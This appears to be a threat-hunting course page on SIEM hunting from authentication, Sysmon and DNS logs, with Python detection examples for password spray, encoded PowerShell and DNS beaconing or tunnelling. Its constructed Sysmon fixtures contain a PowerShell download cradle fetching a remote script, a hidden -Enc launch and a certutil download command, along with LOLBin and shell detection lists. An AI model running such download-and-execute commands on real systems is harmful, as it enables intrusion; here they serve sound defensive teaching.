Module 2: SIEM Hunting Deep Dive
Hunt within constrained data — authentication only, Sysmon only, network logs only. Discover what each source reveals and what it hides.
Lessons & Labs
Authentication Hunting
Credential spray patterns, impossible travel, off-hours logons, service account abuse, and how to detect slow-and-low attacks that stay below brute-force thresholds.
Lab 2.1 — Auth-Only Hunt
Constrained to Windows Security authentication events: 4624 (successful logon), 4625 (failed logon) and 4634 (logoff). Find the slow credential spray attack using ONLY logon events. No Sysmon, no firewall, no DNS.
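The slow-and-low point from the lesson, shown as an added example (not course or lab code): a per-account lockout rule stays silent when each account sees one failure, while pivoting the same 4625 events on the source address exposes the spray. The events, addresses and account names below are constructed for illustration and are not the lab dataset.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ev(ts, eid, user, ip, substatus=None):
    """Minimal view of a Windows Security logon event (constructed, not lab data)."""
    return {"ts": datetime.fromisoformat(ts), "EventID": eid,
            "TargetUserName": user, "IpAddress": ip, "SubStatus": substatus}


# 0xC000006A = "user name is correct but the password is wrong".
EVENTS = [
    # spray from 10.0.0.77: one guess per account, roughly an hour apart
    ev("2024-03-04T01:05:00", 4625, "a.moore",    "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T02:11:00", 4625, "b.kim",      "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T03:07:00", 4625, "c.ortiz",    "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T04:02:00", 4625, "d.singh",    "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T05:19:00", 4625, "e.novak",    "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T06:14:00", 4625, "f.wu",       "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T07:09:00", 4625, "g.hale",     "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T08:01:00", 4625, "svc_backup", "10.0.0.77", "0xC000006A"),
    ev("2024-03-04T08:03:00", 4624, "svc_backup", "10.0.0.77"),  # the guess landed
    # a user mistyping a password three times from their own workstation, then logging in
    ev("2024-03-04T09:00:00", 4625, "h.ibarra", "10.0.0.12", "0xC000006A"),
    ev("2024-03-04T09:00:20", 4625, "h.ibarra", "10.0.0.12", "0xC000006A"),
    ev("2024-03-04T09:00:45", 4625, "h.ibarra", "10.0.0.12", "0xC000006A"),
    ev("2024-03-04T09:01:10", 4624, "h.ibarra", "10.0.0.12"),
]


def per_account_lockout_alerts(events, threshold=5, window=timedelta(minutes=30)):
    """What a lockout-style rule sees: N failures against ONE account in a short window."""
    fails = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            fails[e["TargetUserName"]].append(e["ts"])
    alerts = []
    for user, times in fails.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):          # sliding window over this account's failures
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts.append(user)
                break
    return sorted(alerts)


def slow_spray_candidates(events, min_users=5, window=timedelta(hours=24)):
    """Pivot on the source instead of the account: many distinct users, few attempts each.
    Also reports which sprayed accounts later produced a 4624 from the same source."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_ip[e["IpAddress"]].append(e)
    findings = {}
    for ip, fails in by_ip.items():
        fails.sort(key=lambda e: e["ts"])
        lo, best = 0, set()
        for hi in range(len(fails)):            # widest set of distinct targets in any window
            while fails[hi]["ts"] - fails[lo]["ts"] > window:
                lo += 1
            users = {e["TargetUserName"] for e in fails[lo:hi + 1]}
            if len(users) > len(best):
                best = users
        if len(best) < min_users:
            continue
        per_user = defaultdict(int)
        for e in fails:
            per_user[e["TargetUserName"]] += 1
        first = fails[0]["ts"]
        landed = sorted({e["TargetUserName"] for e in events
                         if e["EventID"] == 4624 and e["IpAddress"] == ip
                         and e["ts"] > first and e["TargetUserName"] in best})
        findings[ip] = {"distinct_users": len(best), "failures": len(fails),
                        "max_failures_per_user": max(per_user.values()),
                        "successes_after_spray": landed}
    return findings


if __name__ == "__main__":
    print("lockout-style alerts:", per_account_lockout_alerts(EVENTS))
    print("spray candidates:", slow_spray_candidates(EVENTS))
```

The source pivot is the whole trick: one failure per account is invisible to any per-account threshold, but eight distinct targets from one address with a success at the end is a spray that found a password. A spray distributed across many source addresses defeats this pivot, and 4625 events for network logons may carry `-` as the source address, so treat the source as one of several pivots (SubStatus, LogonType, workstation name), not the only one.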
Process and Sysmon Hunting
Parent-child process analysis, rare process detection, living-off-the-land binaries, encoded commands, and Sysmon event type deep dives.
Lab 2.2 — Sysmon-Only Hunt
Constrained to Sysmon events: EID 1 (process creation), 3 (network connection), 7 (image loaded), 8 (CreateRemoteThread), 11 (file created) and 13 (registry value set). Find the insider's abnormal process activity using ONLY endpoint telemetry.
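Three of the lesson's techniques (parent-child analysis, rare process detection and encoded-command decoding) run over a constructed batch of Sysmon EID 1 events, as an added example that is not course or lab code. The hostnames, paths, the 203.0.113.9 address and the command lines are invented for illustration; the encoded payload is built inline so the decoder can be checked against it.

```python
import base64
import re
from collections import Counter


def ev(host, parent, image, cmd):
    """Constructed Sysmon EID 1 record: the three fields these checks need."""
    return {"host": host, "ParentImage": parent, "Image": image, "CommandLine": cmd}


def leaf(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed sample, not lab data. The payload is encoded the way PowerShell expects
# (UTF-16LE, then base64), so the decoder below has something real to undo.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
W = "C:\\Windows\\System32\\"
OFFICE16 = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
EVENTS = (
    [ev("WS01", W + "explorer.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "chrome.exe")] * 4
    + [ev("WS01", W + "services.exe", W + "svchost.exe", "svchost.exe -k netsvcs")] * 5
    + [ev("WS01", W + "svchost.exe", W + "taskhostw.exe", "taskhostw.exe")] * 2
    + [ev("WS01", W + "explorer.exe", OFFICE16 + "OUTLOOK.EXE", "OUTLOOK.EXE")] * 2
    + [ev("WS01", W + "explorer.exe", OFFICE16 + "WINWORD.EXE", 'WINWORD.EXE /n "invoice.docm"')]
    + [ev("WS01", OFFICE16 + "WINWORD.EXE", W + "WindowsPowerShell\\v1.0\\powershell.exe",
          f"powershell.exe -NoP -W Hidden -Enc {ENC}")]
    + [ev("WS01", W + "cmd.exe", W + "certutil.exe",
          "certutil -urlcache -split -f http://203.0.113.9/x.dat x.dat")]
)

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBIN_DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe"}
# "-e", "-ec", "-enc", "-EncodedCommand": PowerShell accepts any unambiguous prefix.
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line carries none."""
    for m in ENC_FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if not "encodedcommand".startswith(flag):   # rejects -ExecutionPolicy and friends
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def rare_parent_child(events, max_count=1):
    """Parent/child pairs seen at most max_count times in this batch."""
    pairs = Counter((leaf(e["ParentImage"]), leaf(e["Image"])) for e in events)
    return sorted(p for p, n in pairs.items() if n <= max_count)


def hunt(events):
    findings = {"rare_pairs": rare_parent_child(events), "office_to_shell": [],
                "encoded": [], "lolbin_download": []}
    for e in events:
        parent, child = leaf(e["ParentImage"]), leaf(e["Image"])
        if parent in OFFICE and child in SHELLS:
            findings["office_to_shell"].append((e["host"], parent, child))
        decoded = decode_encoded_command(e["CommandLine"])
        if decoded is not None:
            findings["encoded"].append((e["host"], decoded))
        if child in LOLBIN_DOWNLOADERS and re.search(r"https?://", e["CommandLine"], re.I):
            findings["lolbin_download"].append((e["host"], e["CommandLine"]))
    return findings


if __name__ == "__main__":
    for k, v in hunt(EVENTS).items():
        print(k, v)
```

Two lessons fall out of the constructed batch. Rarity alone is not evidence: `explorer.exe -> winword.exe` is flagged as rare only because this batch is small, which is why rare-process hunting needs a fleet-wide baseline rather than one host's day. The relationship checks (Office spawning a shell, a known downloader LOLBin with a URL on its command line) hold regardless of volume, and decoding `-Enc` turns an opaque blob into a download cradle you can pivot on.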
Network-Aware SIEM Hunting
DNS anomalies visible in SIEM data, proxy patterns, firewall deny intelligence, and C2 indicators detectable without a dedicated network sensor.
Lab 2.3 — DNS and Proxy Hunt
Constrained to DNS, proxy, and firewall events. Find C2 communication and data exfiltration using ONLY network-layer SIEM data.
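Two C2 indicators the lesson says are detectable from SIEM DNS logs alone, periodic resolution of one name (beaconing) and high-entropy subdomains under one apex (tunnelled exfiltration), run over a constructed query log as an added example that is not course or lab code. The source addresses, the `cdn-metrics.example` and `tun.example` names and the timing are invented; the registered-domain logic is a two-label simplification, not a Public Suffix List lookup.

```python
import math
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def q(ts, src, name):
    """Constructed DNS query record (not lab data)."""
    return {"ts": ts, "src_ip": src, "query": name.lower().rstrip(".")}


BASE = datetime(2024, 3, 4, 10, 0, 0)
def at(sec): return BASE + timedelta(seconds=sec)


EVENTS = []
# 1) beacon: an implant on 10.0.0.41 resolves its C2 name about every 60 s, with jitter
for sec in (0, 60, 118, 180, 240, 299, 360):
    EVENTS.append(q(at(sec), "10.0.0.41", "update.cdn-metrics.example"))
# 2) tunnel: 10.0.0.58 pushes data out as 32-char hex labels under one apex, irregular timing
PERMS = ["0123456789abcdef", "fedcba9876543210", "02468ace13579bdf",
         "13579bdf02468ace", "048c159d26ae37bf", "37bf26ae159d048c"]
for sec, p in zip((0, 1, 5, 6, 14, 15), PERMS):
    EVENTS.append(q(at(400 + sec), "10.0.0.58", f"{p}{p[::-1]}.tun.example"))
# 3) ordinary browsing from 10.0.0.12
for sec, name in [(5, "www.example.org"), (9, "mail.example.org"), (310, "cdn.example.net"),
                  (1200, "www.example.org"), (1207, "api.example.net")]:
    EVENTS.append(q(at(sec), "10.0.0.12", name))


def apex(name):
    """Simplification: the last two labels. Real hunts need the Public Suffix List (co.uk...)."""
    return ".".join(name.split(".")[-2:])


def shannon_entropy(s):
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def beacon_candidates(events, min_queries=6, max_cv=0.2):
    """Per (source, apex): flag when inter-query gaps are nearly constant
    (coefficient of variation below max_cv). Jittered beacons still score low."""
    series = defaultdict(list)
    for e in events:
        series[(e["src_ip"], apex(e["query"]))].append(e["ts"])
    out = {}
    for key, times in series.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        if m <= 0:
            continue
        cv = pstdev(gaps) / m
        if cv <= max_cv:
            out[key] = {"queries": len(times), "period_s": round(m), "cv": round(cv, 3)}
    return out


def tunnel_candidates(events, min_unique=5, min_len=20, min_entropy=3.5):
    """Per (source, apex): many distinct, long, high-entropy leftmost labels."""
    labels = defaultdict(set)
    for e in events:
        parts = e["query"].split(".")
        if len(parts) > 2:
            labels[(e["src_ip"], apex(e["query"]))].add(parts[0])
    out = {}
    for key, subs in labels.items():
        odd = [s for s in subs if len(s) >= min_len and shannon_entropy(s) >= min_entropy]
        if len(odd) >= min_unique:
            out[key] = {"unique_labels": len(subs), "high_entropy_labels": len(odd),
                        "avg_label_len": round(mean(len(s) for s in subs), 1)}
    return out


if __name__ == "__main__":
    print("beacons:", beacon_candidates(EVENTS))
    print("tunnels:", tunnel_candidates(EVENTS))
```

Both checks are aggregations over fields every DNS log has (time, source, query name), which is what makes them usable without a network sensor. The caveats are the usual ones: CDNs and update services also beacon, so the period and the destination's reputation decide the verdict, and a resolver in the path replaces the client address with its own, so confirm whether your DNS source records the original client before pivoting on `src_ip`.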
Log Coverage Assessment
Visibility gaps and blind spots. Single points of failure. Sysmon deployment gaps. Mapping your log coverage to ATT&CK techniques — and knowing where you cannot hunt.
Lab 2.4 — Coverage Gap Analysis
Full dataset analysis: which attack scenarios are visible from which log source? Map coverage, identify blind spots, and recommend instrumentation improvements.
Archives and Raw Log Hunting
Hunting in wazuh-archives-* where there are no rule.level scores to guide you. Pure data exploration with 150K+ raw events — the closest lab environment to real-world hunting.
Lab 2.5 — Archives Deep Dive
Hunt in wazuh-archives-* (150K+ raw events). No rule.level, no CDB enrichment. Find the anomalies buried in raw log volume using only field analysis and aggregation.